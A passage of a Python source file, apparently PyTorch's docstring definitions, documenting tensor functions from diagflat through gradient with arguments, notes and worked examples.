tensor([[-0.2956, 0.0000, 0.0000],
[ 0.0000, -0.9068, 0.0000],
[ 0.0000, 0.0000, 0.1695]])
>>> torch.diagflat(a, 1)
tensor([[ 0.0000, -0.2956, 0.0000, 0.0000],
[ 0.0000, 0.0000, -0.9068, 0.0000],
[ 0.0000, 0.0000, 0.0000, 0.1695],
[ 0.0000, 0.0000, 0.0000, 0.0000]])
>>> a = torch.randn(2, 2)
>>> a
tensor([[ 0.2094, -0.3018],
[-0.1516, 1.9342]])
>>> torch.diagflat(a)
tensor([[ 0.2094, 0.0000, 0.0000, 0.0000],
[ 0.0000, -0.3018, 0.0000, 0.0000],
[ 0.0000, 0.0000, -0.1516, 0.0000],
[ 0.0000, 0.0000, 0.0000, 1.9342]])
""".format(**common_args))
add_docstr(torch.diagonal,
r"""
diagonal(input, offset=0, dim1=0, dim2=1) -> Tensor
Returns a partial view of :attr:`input` with its diagonal elements
with respect to :attr:`dim1` and :attr:`dim2` appended as a dimension
at the end of the shape.
The argument :attr:`offset` controls which diagonal to consider:
- If :attr:`offset` = 0, it is the main diagonal.
- If :attr:`offset` > 0, it is above the main diagonal.
- If :attr:`offset` < 0, it is below the main diagonal.
Applying :meth:`torch.diag_embed` to the output of this function with
the same arguments yields a diagonal matrix with the diagonal entries
of the input. However, :meth:`torch.diag_embed` has different default
dimensions, so those need to be explicitly specified.
Args:
{input} Must be at least 2-dimensional.
offset (int, optional): which diagonal to consider. Default: 0
(main diagonal).
dim1 (int, optional): first dimension with respect to which to
take diagonal. Default: 0.
dim2 (int, optional): second dimension with respect to which to
take diagonal. Default: 1.
.. note:: To take a batch diagonal, pass in dim1=-2, dim2=-1.
Examples::
>>> a = torch.randn(3, 3)
>>> a
tensor([[-1.0854, 1.1431, -0.1752],
[ 0.8536, -0.0905, 0.0360],
[ 0.6927, -0.3735, -0.4945]])
>>> torch.diagonal(a, 0)
tensor([-1.0854, -0.0905, -0.4945])
>>> torch.diagonal(a, 1)
tensor([ 1.1431, 0.0360])
>>> x = torch.randn(2, 5, 4, 2)
>>> torch.diagonal(x, offset=-1, dim1=1, dim2=2)
tensor([[[-1.2631, 0.3755, -1.5977, -1.8172],
[-1.1065, 1.0401, -0.2235, -0.7938]],
[[-1.7325, -0.3081, 0.6166, 0.2335],
[ 1.0500, 0.7336, -0.3836, -1.1015]]])
""".format(**common_args))
add_docstr(torch.diagonal_scatter,
r"""
diagonal_scatter(input, src, offset=0, dim1=0, dim2=1) -> Tensor
Embeds the values of the :attr:`src` tensor into :attr:`input` along
the diagonal elements of :attr:`input`, with respect to :attr:`dim1`
and :attr:`dim2`.
This function returns a tensor with fresh storage; it does not
return a view.
The argument :attr:`offset` controls which diagonal to consider:
- If :attr:`offset` = 0, it is the main diagonal.
- If :attr:`offset` > 0, it is above the main diagonal.
- If :attr:`offset` < 0, it is below the main diagonal.
Args:
{input} Must be at least 2-dimensional.
src (Tensor): the tensor to embed into :attr:`input`.
offset (int, optional): which diagonal to consider. Default: 0
(main diagonal).
dim1 (int, optional): first dimension with respect to which to
take diagonal. Default: 0.
dim2 (int, optional): second dimension with respect to which to
take diagonal. Default: 1.
.. note::
:attr:`src` must be of the proper size in order to be embedded
into :attr:`input`. Specifically, it should have the same shape as
``torch.diagonal(input, offset, dim1, dim2)``
Examples::
>>> a = torch.zeros(3, 3)
>>> a
tensor([[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]])
>>> torch.diagonal_scatter(a, torch.ones(3), 0)
tensor([[1., 0., 0.],
[0., 1., 0.],
[0., 0., 1.]])
>>> torch.diagonal_scatter(a, torch.ones(2), 1)
tensor([[0., 1., 0.],
[0., 0., 1.],
[0., 0., 0.]])
""".format(**common_args))
add_docstr(torch.diff, r"""
diff(input, n=1, dim=-1, prepend=None, append=None) -> Tensor
Computes the n-th forward difference along the given dimension.
The first-order differences are given by `out[i] = input[i + 1] - input[i]`. Higher-order
differences are calculated by using :func:`torch.diff` recursively.
Args:
input (Tensor): the tensor to compute the differences on
n (int, optional): the number of times to recursively compute the difference
dim (int, optional): the dimension to compute the difference along.
Default is the last dimension.
prepend, append (Tensor, optional): values to prepend or append to
:attr:`input` along :attr:`dim` before computing the difference.
Their dimensions must be equivalent to that of input, and their shapes
must match input's shape except on :attr:`dim`.
Keyword args:
{out}
Example::
>>> a = torch.tensor([1, 3, 2])
>>> torch.diff(a)
tensor([ 2, -1])
>>> b = torch.tensor([4, 5])
>>> torch.diff(a, append=b)
tensor([ 2, -1, 2, 1])
>>> c = torch.tensor([[1, 2, 3], [3, 4, 5]])
>>> torch.diff(c, dim=0)
tensor([[2, 2, 2]])
>>> torch.diff(c, dim=1)
tensor([[1, 1],
[1, 1]])
""".format(**common_args))
add_docstr(torch.digamma, r"""
digamma(input, *, out=None) -> Tensor
Alias for :func:`torch.special.digamma`.
""")
add_docstr(torch.dist,
r"""
dist(input, other, p=2) -> Tensor
Returns the p-norm of (:attr:`input` - :attr:`other`)
The shapes of :attr:`input` and :attr:`other` must be
:ref:`broadcastable <broadcasting-semantics>`.
Args:
{input}
other (Tensor): the right-hand side input tensor
p (float, optional): the norm to be computed
Example::
>>> x = torch.randn(4)
>>> x
tensor([-1.5393, -0.8675, 0.5916, 1.6321])
>>> y = torch.randn(4)
>>> y
tensor([ 0.0967, -1.0511, 0.6295, 0.8360])
>>> torch.dist(x, y, 3.5)
tensor(1.6727)
>>> torch.dist(x, y, 3)
tensor(1.6973)
>>> torch.dist(x, y, 0)
tensor(inf)
>>> torch.dist(x, y, 1)
tensor(2.6537)
""".format(**common_args))
add_docstr(torch.div, r"""
div(input, other, *, rounding_mode=None, out=None) -> Tensor
Divides each element of the input ``input`` by the corresponding element of
:attr:`other`.
.. math::
\text{{out}}_i = \frac{{\text{{input}}_i}}{{\text{{other}}_i}}
.. note::
By default, this performs a "true" division like Python 3.
See the :attr:`rounding_mode` argument for floor division.
Supports :ref:`broadcasting to a common shape <broadcasting-semantics>`,
:ref:`type promotion <type-promotion-doc>`, and integer, float, and complex inputs.
Always promotes integer types to the default scalar type.
Args:
input (Tensor): the dividend
other (Tensor or Number): the divisor
Keyword args:
rounding_mode (str, optional): Type of rounding applied to the result:
* None - default behavior. Performs no rounding and, if both :attr:`input` and
:attr:`other` are integer types, promotes the inputs to the default scalar type.
Equivalent to true division in Python (the ``/`` operator) and NumPy's ``np.true_divide``.
* ``"trunc"`` - rounds the results of the division towards zero.
Equivalent to C-style integer division.
* ``"floor"`` - rounds the results of the division down.
Equivalent to floor division in Python (the ``//`` operator) and NumPy's ``np.floor_divide``.
{out}
Examples::
>>> x = torch.tensor([ 0.3810, 1.2774, -0.2972, -0.3719, 0.4637])
>>> torch.div(x, 0.5)
tensor([ 0.7620, 2.5548, -0.5944, -0.7438, 0.9274])
>>> a = torch.tensor([[-0.3711, -1.9353, -0.4605, -0.2917],
... [ 0.1815, -1.0111, 0.9805, -1.5923],
... [ 0.1062, 1.4581, 0.7759, -1.2344],
... [-0.1830, -0.0313, 1.1908, -1.4757]])
>>> b = torch.tensor([ 0.8032, 0.2930, -0.8113, -0.2308])
>>> torch.div(a, b)
tensor([[-0.4620, -6.6051, 0.5676, 1.2639],
[ 0.2260, -3.4509, -1.2086, 6.8990],
[ 0.1322, 4.9764, -0.9564, 5.3484],
[-0.2278, -0.1068, -1.4678, 6.3938]])
>>> torch.div(a, b, rounding_mode='trunc')
tensor([[-0., -6., 0., 1.],
[ 0., -3., -1., 6.],
[ 0., 4., -0., 5.],
[-0., -0., -1., 6.]])
>>> torch.div(a, b, rounding_mode='floor')
tensor([[-1., -7., 0., 1.],
[ 0., -4., -2., 6.],
[ 0., 4., -1., 5.],
[-1., -1., -2., 6.]])
""".format(**common_args))
add_docstr(torch.divide, r"""
divide(input, other, *, rounding_mode=None, out=None) -> Tensor
Alias for :func:`torch.div`.
""")
add_docstr(torch.dot,
r"""
dot(input, other, *, out=None) -> Tensor
Computes the dot product of two 1D tensors.
.. note::
Unlike NumPy's dot, torch.dot intentionally only supports computing the dot product
of two 1D tensors with the same number of elements.
Args:
input (Tensor): first tensor in the dot product, must be 1D.
other (Tensor): second tensor in the dot product, must be 1D.
Keyword args:
{out}
Example::
>>> torch.dot(torch.tensor([2, 3]), torch.tensor([2, 1]))
tensor(7)
""".format(**common_args))
add_docstr(torch.vdot,
r"""
vdot(input, other, *, out=None) -> Tensor
Computes the dot product of two 1D tensors. The vdot(a, b) function handles complex numbers
differently than dot(a, b). If the first argument is complex, the complex conjugate of the
first argument is used for the calculation of the dot product.
.. note::
Unlike NumPy's vdot, torch.vdot intentionally only supports computing the dot product
of two 1D tensors with the same number of elements.
Args:
input (Tensor): first tensor in the dot product, must be 1D. Its conjugate is used if it's complex.
other (Tensor): second tensor in the dot product, must be 1D.
Keyword args:
{out}
Example::
>>> torch.vdot(torch.tensor([2, 3]), torch.tensor([2, 1]))
tensor(7)
>>> a = torch.tensor((1 + 2j, 3 - 1j))
>>> b = torch.tensor((2 + 1j, 4 - 0j))
>>> torch.vdot(a, b)
tensor(16.+1.j)
>>> torch.vdot(b, a)
tensor(16.-1.j)
""".format(**common_args))
add_docstr(torch.eig,
r"""
eig(input, eigenvectors=False, *, out=None) -> (Tensor, Tensor)
Computes the eigenvalues and eigenvectors of a real square matrix.
.. note::
Since eigenvalues and eigenvectors might be complex, the backward pass is supported only
if all eigenvalues and eigenvectors are real-valued.
When :attr:`input` is on CUDA, :func:`torch.eig() <torch.eig>` causes
host-device synchronization.
.. warning::
:func:`torch.eig` is deprecated in favor of :func:`torch.linalg.eig`
and will be removed in a future PyTorch release.
:func:`torch.linalg.eig` returns complex tensors of dtype `cfloat` or `cdouble`
rather than real tensors mimicking complex tensors.
``L, _ = torch.eig(A)`` should be replaced with
.. code :: python
L_complex = torch.linalg.eigvals(A)
``L, V = torch.eig(A, eigenvectors=True)`` should be replaced with
.. code :: python
L_complex, V_complex = torch.linalg.eig(A)
Args:
input (Tensor): the square matrix of shape :math:`(n \times n)` for which the eigenvalues and eigenvectors
will be computed
eigenvectors (bool): ``True`` to compute both eigenvalues and eigenvectors;
otherwise, only eigenvalues will be computed
Keyword args:
out (tuple, optional): the output tensors
Returns:
(Tensor, Tensor): A namedtuple (eigenvalues, eigenvectors) containing
- **eigenvalues** (*Tensor*): Shape :math:`(n \times 2)`. Each row is an eigenvalue of ``input``,
where the first element is the real part and the second element is the imaginary part.
The eigenvalues are not necessarily ordered.
- **eigenvectors** (*Tensor*): If ``eigenvectors=False``, it's an empty tensor.
Otherwise, this tensor of shape :math:`(n \times n)` can be used to compute normalized (unit length)
eigenvectors of corresponding eigenvalues as follows.
If the corresponding `eigenvalues[j]` is a real number, column `eigenvectors[:, j]` is the eigenvector
corresponding to `eigenvalues[j]`.
If the corresponding `eigenvalues[j]` and `eigenvalues[j + 1]` form a complex conjugate pair, then the
true eigenvectors can be computed as
:math:`\text{true eigenvector}[j] = eigenvectors[:, j] + i \times eigenvectors[:, j + 1]`,
:math:`\text{true eigenvector}[j + 1] = eigenvectors[:, j] - i \times eigenvectors[:, j + 1]`.
Example::
Trivial example with a diagonal matrix. By default, only eigenvalues are computed:
>>> a = torch.diag(torch.tensor([1, 2, 3], dtype=torch.double))
>>> e, v = torch.eig(a)
>>> e
tensor([[1., 0.],
[2., 0.],
[3., 0.]], dtype=torch.float64)
>>> v
tensor([], dtype=torch.float64)
Compute also the eigenvectors:
>>> e, v = torch.eig(a, eigenvectors=True)
>>> e
tensor([[1., 0.],
[2., 0.],
[3., 0.]], dtype=torch.float64)
>>> v
tensor([[1., 0., 0.],
[0., 1., 0.],
[0., 0., 1.]], dtype=torch.float64)
""")
add_docstr(torch.eq, r"""
eq(input, other, *, out=None) -> Tensor
Computes element-wise equality.
The second argument can be a number or a tensor whose shape is
:ref:`broadcastable <broadcasting-semantics>` with the first argument.
Args:
input (Tensor): the tensor to compare
other (Tensor or float): the tensor or value to compare
Keyword args:
{out}
Returns:
A boolean tensor that is True where :attr:`input` is equal to :attr:`other` and False elsewhere
Example::
>>> torch.eq(torch.tensor([[1, 2], [3, 4]]), torch.tensor([[1, 1], [4, 4]]))
tensor([[ True, False],
[False, True]])
""".format(**common_args))
add_docstr(torch.equal,
r"""
equal(input, other) -> bool
``True`` if two tensors have the same size and elements, ``False`` otherwise.
Example::
>>> torch.equal(torch.tensor([1, 2]), torch.tensor([1, 2]))
True
""")
add_docstr(torch.erf,
r"""
erf(input, *, out=None) -> Tensor
Alias for :func:`torch.special.erf`.
""")
add_docstr(torch.erfc,
r"""
erfc(input, *, out=None) -> Tensor
Alias for :func:`torch.special.erfc`.
""")
add_docstr(torch.erfinv,
r"""
erfinv(input, *, out=None) -> Tensor
Alias for :func:`torch.special.erfinv`.
""")
add_docstr(torch.exp,
r"""
exp(input, *, out=None) -> Tensor
Returns a new tensor with the exponential of the elements
of the input tensor :attr:`input`.
.. math::
y_{i} = e^{x_{i}}
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> torch.exp(torch.tensor([0, math.log(2.)]))
tensor([ 1., 2.])
""".format(**common_args))
add_docstr(torch.exp2,
r"""
exp2(input, *, out=None) -> Tensor
Alias for :func:`torch.special.exp2`.
""")
add_docstr(torch.expm1,
r"""
expm1(input, *, out=None) -> Tensor
Alias for :func:`torch.special.expm1`.
""")
add_docstr(torch.eye,
r"""
eye(n, m=None, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Returns a 2-D tensor with ones on the diagonal and zeros elsewhere.
Args:
n (int): the number of rows
m (int, optional): the number of columns with default being :attr:`n`
Keyword arguments:
{out}
{dtype}
{layout}
{device}
{requires_grad}
Returns:
Tensor: A 2-D tensor with ones on the diagonal and zeros elsewhere
Example::
>>> torch.eye(3)
tensor([[ 1., 0., 0.],
[ 0., 1., 0.],
[ 0., 0., 1.]])
""".format(**factory_common_args))
add_docstr(torch.floor,
r"""
floor(input, *, out=None) -> Tensor
Returns a new tensor with the floor of the elements of :attr:`input`,
the largest integer less than or equal to each element.
.. math::
\text{out}_{i} = \left\lfloor \text{input}_{i} \right\rfloor
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-0.8166, 1.5308, -0.2530, -0.2091])
>>> torch.floor(a)
tensor([-1., 1., -1., -1.])
""".format(**common_args))
add_docstr(torch.floor_divide, r"""
floor_divide(input, other, *, out=None) -> Tensor
.. warning::
:func:`torch.floor_divide` is deprecated and will be removed in a future PyTorch
release. Its name is a misnomer because it actually rounds the quotient
towards zero instead of taking its floor. To keep the current behavior use
:func:`torch.div` with ``rounding_mode='trunc'``. To actually perform floor
division, use :func:`torch.div` with ``rounding_mode='floor'``.
Computes :attr:`input` divided by :attr:`other`, elementwise, and rounds each
quotient towards zero. Equivalently, it truncates the quotient(s):
.. math::
\text{out}_i = \text{trunc} \left( \frac{\text{input}_i}{\text{other}_i} \right)
""" + r"""
Supports broadcasting to a common shape, type promotion, and integer and float inputs.
Args:
input (Tensor or Number): the dividend
other (Tensor or Number): the divisor
Keyword args:
{out}
Example::
>>> a = torch.tensor([4.0, 3.0])
>>> b = torch.tensor([2.0, 2.0])
>>> torch.floor_divide(a, b)
tensor([2.0, 1.0])
>>> torch.floor_divide(a, 1.4)
tensor([2.0, 2.0])
""".format(**common_args))
add_docstr(torch.fmod,
r"""
fmod(input, other, *, out=None) -> Tensor
Applies C++'s `std::fmod <https://en.cppreference.com/w/cpp/numeric/math/fmod>`_
for floating point tensors, and the modulus operation for integer tensors. The result
has the same sign as the dividend :attr:`input` and its absolute value
is less than that of :attr:`other`.
Supports :ref:`broadcasting to a common shape <broadcasting-semantics>`,
:ref:`type promotion <type-promotion-doc>`, and integer and float inputs.
.. note::
When the divisor is zero, returns ``NaN`` for floating point dtypes
on both CPU and GPU; raises ``RuntimeError`` for integer division by
zero on CPU; integer division by zero on GPU may return any value.
.. note::
Complex inputs are not supported. In some cases, it is not mathematically
possible to satisfy the definition of a modulo operation with complex numbers.
Args:
input (Tensor): the dividend
other (Tensor or Scalar): the divisor
Keyword args:
{out}
Example::
>>> torch.fmod(torch.tensor([-3., -2, -1, 1, 2, 3]), 2)
tensor([-1., -0., -1., 1., 0., 1.])
>>> torch.fmod(torch.tensor([1, 2, 3, 4, 5]), -1.5)
tensor([1.0000, 0.5000, 0.0000, 1.0000, 0.5000])
.. seealso::
:func:`torch.remainder` which is similar to :func:`torch.fmod` except that if the sign
of the modulus is different than the sign of the divisor :attr:`other` then the divisor
is added to the modulus.
""".format(**common_args))
add_docstr(torch.frac,
r"""
frac(input, *, out=None) -> Tensor
Computes the fractional portion of each element in :attr:`input`.
.. math::
\text{out}_{i} = \text{input}_{i} - \left\lfloor |\text{input}_{i}| \right\rfloor * \operatorname{sgn}(\text{input}_{i})
Example::
>>> torch.frac(torch.tensor([1, 2.5, -3.2]))
tensor([ 0.0000, 0.5000, -0.2000])
""")
add_docstr(torch.frexp,
r"""
frexp(input, *, out=None) -> (Tensor mantissa, Tensor exponent)
Decomposes :attr:`input` into mantissa and exponent tensors
such that :math:`\text{input} = \text{mantissa} \times 2^{\text{exponent}}`.
The range of mantissa is the open interval (-1, 1).
Supports float inputs.
Args:
input (Tensor): the input tensor
Keyword args:
out (tuple, optional): the output tensors
Example::
>>> x = torch.arange(9.)
>>> mantissa, exponent = torch.frexp(x)
>>> mantissa
tensor([0.0000, 0.5000, 0.5000, 0.7500, 0.5000, 0.6250, 0.7500, 0.8750, 0.5000])
>>> exponent
tensor([0, 1, 2, 2, 3, 3, 3, 3, 4], dtype=torch.int32)
>>> torch.ldexp(mantissa, exponent)
tensor([0., 1., 2., 3., 4., 5., 6., 7., 8.])
""")
add_docstr(torch.from_numpy,
r"""
from_numpy(ndarray) -> Tensor
Creates a :class:`Tensor` from a :class:`numpy.ndarray`.
The returned tensor and :attr:`ndarray` share the same memory. Modifications to
the tensor will be reflected in the :attr:`ndarray` and vice versa. The returned
tensor is not resizable.
It currently accepts :attr:`ndarray` with dtypes of ``numpy.float64``,
``numpy.float32``, ``numpy.float16``, ``numpy.complex64``, ``numpy.complex128``,
``numpy.int64``, ``numpy.int32``, ``numpy.int16``, ``numpy.int8``, ``numpy.uint8``,
and ``numpy.bool``.
.. warning::
Writing to a tensor created from a read-only NumPy array is not supported and will result in undefined behavior.
Example::
>>> a = numpy.array([1, 2, 3])
>>> t = torch.from_numpy(a)
>>> t
tensor([ 1, 2, 3])
>>> t[0] = -1
>>> a
array([-1, 2, 3])
""")
add_docstr(torch.frombuffer,
r"""
frombuffer(buffer, *, dtype, count=-1, offset=0, requires_grad=False) -> Tensor
Creates a 1-dimensional :class:`Tensor` from an object that implements
the Python buffer protocol.
Skips the first :attr:`offset` bytes in the buffer, and interprets the rest of
the raw bytes as a 1-dimensional tensor of type :attr:`dtype` with :attr:`count`
elements.
Note that either of the following must be true:
1. :attr:`count` is a positive non-zero number, and the total number of bytes
in the buffer is greater than or equal to :attr:`offset` plus :attr:`count` times the size
(in bytes) of :attr:`dtype`.
2. :attr:`count` is negative, and the length (number of bytes) of the buffer
subtracted by the :attr:`offset` is a multiple of the size (in bytes) of
:attr:`dtype`.
The returned tensor and buffer share the same memory. Modifications to
the tensor will be reflected in the buffer and vice versa. The returned
tensor is not resizable.
.. note::
This function increments the reference count for the object that
owns the shared memory. Therefore, such memory will not be deallocated
before the returned tensor goes out of scope.
.. warning::
This function's behavior is undefined when passed an object implementing
the buffer protocol whose data is not on the CPU. Doing so is likely to
cause a segmentation fault.
.. warning::
This function does not try to infer the :attr:`dtype` (hence, it is not
optional). Passing a different :attr:`dtype` than its source may result
in unexpected behavior.
Args:
buffer (object): a Python object that exposes the buffer interface.
Keyword args:
dtype (:class:`torch.dtype`): the desired data type of returned tensor.
count (int, optional): the number of desired elements to be read.
If negative, all the elements (until the end of the buffer) will be
read. Default: -1.
offset (int, optional): the number of bytes to skip at the start of
the buffer. Default: 0.
{requires_grad}
Example::
>>> import array
>>> a = array.array('i', [1, 2, 3])
>>> t = torch.frombuffer(a, dtype=torch.int32)
>>> t
tensor([ 1, 2, 3])
>>> t[0] = -1
>>> a
array([-1, 2, 3])
>>> # Interprets the signed char bytes as 32-bit integers.
>>> # Each 4 signed char elements will be interpreted as
>>> # 1 signed 32-bit integer.
>>> import array
>>> a = array.array('b', [-1, 0, 0, 0])
>>> torch.frombuffer(a, dtype=torch.int32)
tensor([255], dtype=torch.int32)
""".format(**factory_common_args))
add_docstr(torch.flatten,
r"""
flatten(input, start_dim=0, end_dim=-1) -> Tensor
Flattens :attr:`input` by reshaping it into a one-dimensional tensor. If :attr:`start_dim` or :attr:`end_dim`
are passed, only dimensions starting with :attr:`start_dim` and ending with :attr:`end_dim` are flattened.
The order of elements in :attr:`input` is unchanged.
Unlike NumPy's flatten, which always copies input's data, this function may return the original object, a view,
or copy. If no dimensions are flattened, then the original object :attr:`input` is returned. Otherwise, if input can
be viewed as the flattened shape, then that view is returned. Finally, only if the input cannot be viewed as the
flattened shape is input's data copied. See :meth:`torch.Tensor.view` for details on when a view will be returned.
.. note::
Flattening a zero-dimensional tensor will return a one-dimensional view.
Args:
{input}
start_dim (int): the first dim to flatten
end_dim (int): the last dim to flatten
Example::
>>> t = torch.tensor([[[1, 2],
... [3, 4]],
... [[5, 6],
... [7, 8]]])
>>> torch.flatten(t)
tensor([1, 2, 3, 4, 5, 6, 7, 8])
>>> torch.flatten(t, start_dim=1)
tensor([[1, 2, 3, 4],
[5, 6, 7, 8]])
""".format(**common_args))
add_docstr(torch.gather,
r"""
gather(input, dim, index, *, sparse_grad=False, out=None) -> Tensor
Gathers values along an axis specified by `dim`.
For a 3-D tensor the output is specified by::
out[i][j][k] = input[index[i][j][k]][j][k] # if dim == 0
out[i][j][k] = input[i][index[i][j][k]][k] # if dim == 1
out[i][j][k] = input[i][j][index[i][j][k]] # if dim == 2
:attr:`input` and :attr:`index` must have the same number of dimensions.
It is also required that ``index.size(d) <= input.size(d)`` for all
dimensions ``d != dim``. :attr:`out` will have the same shape as :attr:`index`.
Note that ``input`` and ``index`` do not broadcast against each other.
Args:
input (Tensor): the source tensor
dim (int): the axis along which to index
index (LongTensor): the indices of elements to gather
Keyword arguments:
sparse_grad (bool, optional): If ``True``, gradient w.r.t. :attr:`input` will be a sparse tensor.
out (Tensor, optional): the destination tensor
Example::
>>> t = torch.tensor([[1, 2], [3, 4]])
>>> torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]]))
tensor([[ 1, 1],
[ 4, 3]])
""")
add_docstr(torch.gcd,
r"""
gcd(input, other, *, out=None) -> Tensor
Computes the element-wise greatest common divisor (GCD) of :attr:`input` and :attr:`other`.
Both :attr:`input` and :attr:`other` must have integer types.
.. note::
This defines :math:`gcd(0, 0) = 0`.
Args:
{input}
other (Tensor): the second input tensor
Keyword arguments:
{out}
Example::
>>> a = torch.tensor([5, 10, 15])
>>> b = torch.tensor([3, 4, 5])
>>> torch.gcd(a, b)
tensor([1, 2, 5])
>>> c = torch.tensor([3])
>>> torch.gcd(a, c)
tensor([1, 1, 3])
""".format(**common_args))
add_docstr(torch.ge, r"""
ge(input, other, *, out=None) -> Tensor
Computes :math:`\text{input} \geq \text{other}` element-wise.
""" + r"""
The second argument can be a number or a tensor whose shape is
:ref:`broadcastable <broadcasting-semantics>` with the first argument.
Args:
input (Tensor): the tensor to compare
other (Tensor or float): the tensor or value to compare
Keyword args:
{out}
Returns:
A boolean tensor that is True where :attr:`input` is greater than or equal to :attr:`other` and False elsewhere
Example::
>>> torch.ge(torch.tensor([[1, 2], [3, 4]]), torch.tensor([[1, 1], [4, 4]]))
tensor([[True, True], [False, True]])
""".format(**common_args))
add_docstr(torch.greater_equal, r"""
greater_equal(input, other, *, out=None) -> Tensor
Alias for :func:`torch.ge`.
""")
add_docstr(torch.gradient,
r"""
gradient(input, *, spacing=1, dim=None, edge_order=1) -> List of Tensors
Estimates the gradient of a function :math:`g : \mathbb{R}^n \rightarrow \mathbb{R}` in
one or more dimensions using the `second-order accurate central differences method
<https://www.ams.org/journals/mcom/1988-51-184/S0025-5718-1988-0935077-0/S0025-5718-1988-0935077-0.pdf>`_.
The gradient of :math:`g` is estimated using samples. By default, when :attr:`spacing` is not
specified, the samples are entirely described by :attr:`input`, and the mapping of input coordinates
to an output is the same as the tensor's mapping of indices to values. For example, for a three-dimensional
:attr:`input` the function described is :math:`g : \mathbb{R}^3 \rightarrow \mathbb{R}`, and
:math:`g(1, 2, 3)\ == input[1, 2, 3]`.
When :attr:`spacing` is specified, it modifies the relationship between :attr:`input` and input coordinates.
This is detailed in the "Keyword Arguments" section below.
The gradient is estimated by estimating each partial derivative of :math:`g` independently. This estimation is
accurate if :math:`g` is in :math:`C^3` (it has at least 3 continuous derivatives), and the estimation can be
improved by providing closer samples. Mathematically, the value at each interior point of a partial derivative
is estimated using `Taylor’s theorem with remainder <https://en.wikipedia.org/wiki/Taylor%27s_theorem>`_.
Letting :math:`x` be an interior point and :math:`x+h_r` be point neighboring it, the partial gradient at
:math:`f(x+h_r)` is estimated using:
.. math::
\begin{aligned}
f(x+h_r) = f(x) + h_r f'(x) + {h_r}^2 \frac{f''(x)}{2} + {h_r}^3 \frac{f'''(x_r)}{6} \\
\end{aligned}
where :math:`x_r` is a number in the interval :math:`[x, x+ h_r]` and using the fact that :math:`f \in C^3`
we derive :
.. math::
f'(x) \approx \frac{ {h_l}^2 f(x+h_r) - {h_r}^2 f(x-h_l)
+ ({h_r}^2-{h_l}^2 ) f(x) }{ {h_r} {h_l}^2 + {h_r}^2 {h_l} }
.. note::
We estimate the gradient of functions in complex domain
:math:`g : \mathbb{C}^n \rightarrow \mathbb{C}` in the same way.
The value of each partial derivative at the boundary points is computed differently. See edge_order below.
Args:
input (``Tensor``): the tensor that represents the values of the function
Keyword args:
spacing (``scalar``, ``list of scalar``, ``list of Tensor``, optional): :attr:`spacing` can be used to modify
how the :attr:`input` tensor's indices relate to sample coordinates. If :attr:`spacing` is a scalar then
the indices are multiplied by the scalar to produce the coordinates. For example, if :attr:`spacing=2` the
indices (1, 2, 3) become coordinates (2, 4, 6). If :attr:`spacing` is a list of scalars then the corresponding
indices are multiplied. For example, if :attr:`spacing=(2, -1, 3)` the indices (1, 2, 3) become coordinates (2, -2, 9).
Finally, if :attr:`spacing` is a list of one-dimensional tensors then each tensor specifies the coordinates for
the corresponding dimension. For example, if the indices are (1, 2, 3) and the tensors are (t0, t1, t2), then
the coordinates are (t0[1], t1[2], t2[3])
dim (``int``, ``list of int``, optional): the dimension or dimensions to approximate the gradient over. By default
the partial gradient in every dimension is computed. Note that when :attr:`dim` is specified the elements of
the :attr:`spacing` argument must correspond with the specified dims.
edge_order (``int``, optional): 1 or 2, for `first-order
<https://www.ams.org/journals/mcom/1988-51-184/S0025-5718-1988-0935077-0/S0025-5718-1988-0935077-0.pdf>`_ or
`second-order <https://www.ams.org/journals/mcom/1988-51-184/S0025-5718-1988-0935077-0/S0025-5718-1988-0935077-0.pdf>`_
estimation of the boundary ("edge") values, respectively.
Examples::
>>> # Estimates the gradient of f(x)=x^2 at points [-2, -1, 2, 4]
>>> coordinates = (torch.tensor([-2., -1., 1., 4.]),)
>>> values = torch.tensor([4., 1., 1., 16.])
>>> torch.gradient(values, spacing = coordinates)
(tensor([-3., -2., 2., 5.]),)
>>> # Estimates the gradient of the R^2 -> R function whose samples are
>>> # described by the tensor t. Implicit coordinates are [0, 1] for the outermost
>>> # dimension and [0, 1, 2, 3] for the innermost dimension, and function estimates
>>> # partial derivative for both dimensions.
>>> t = torch.tensor([[1, 2, 4, 8], [10, 20, 40, 80]])
>>> torch.gradient(t)
(tensor([[ 9., 18., 36., 72.],
[ 9., 18., 36., 72.]]),
tensor([[ 1.0000, 1.5000, 3.0000, 4.0000],
[10.0000, 15.0000, 30.0000, 40.0000]]))
>>> # A scalar value for spacing modifies the relationship between tensor indices
>>> # and input coordinates by multiplying the indices to find the
>>> # coordinates. For example, below the indices of the innermost
>>> # 0, 1, 2, 3 translate to coordinates of [0, 2, 4, 6], and the indices of
>>> # the outermost dimension 0, 1 translate to coordinates of [0, 2].
>>> torch.gradient(t, spacing = 2.0) # dim = None (implicitly [0, 1])
(tensor([[ 4.5000, 9.0000, 18.0000, 36.0000],
[ 4.5000, 9.0000, 18.0000, 36.0000]]),
tensor([[ 0.5000, 0.7500, 1.5000, 2.0000],
[ 5.0000, 7.5000, 15.0000, 20.0000]]))
>>> # doubling the spacing between samples halves the estimated partial gradients.
>>>
>>> # Estimates only the partial derivative for dimension 1
>>> torch.gradient(t, dim = 1) # spacing = None (implicitly 1.)
(tensor([[ 1.0000, 1.5000, 3.0000, 4.0000],
[10.0000, 15.0000, 30.0000, 40.0000]]),)
>>> # When spacing is a list of scalars, the relationship between the tensor
>>> # indices and input coordinates changes based on dimension.
>>> # For example, below, the indices of the innermost dimension 0, 1, 2, 3 translate
>>> # to coordinates of [0, 3, 6, 9], and the indices of the outermost dimension
>>> # 0, 1 translate to coordinates of [0, 2].
>>> torch.gradient(t, spacing = [3., 2.])
(tensor([[ 4.5000, 9.0000, 18.0000, 36.0000],
[ 4.5000, 9.0000, 18.0000, 36.0000]]),
tensor([[ 0.3333, 0.5000, 1.0000, 1.3333],
[ 3.3333, 5.0000, 10.0000, 13.3333]]))
>>> # The following example is a replication of the previous one with explicit
>>> # coordinates.
>>> coords = (torch.tensor([0, 2]), torch.tensor([0, 3, 6, 9]))
>>> torch.gradient(t, spacing = coords)
(tensor([[ 4.5000, 9.0000, 18.0000, 36.0000],
[ 4.5000, 9.0000, 18.0000, 36.0000]]),
tensor([[ 0.3333, 0.5000, 1.0000, 1.3333],
[ 3.3333, 5.0000, 10.0000, 13.3333]]))
""")
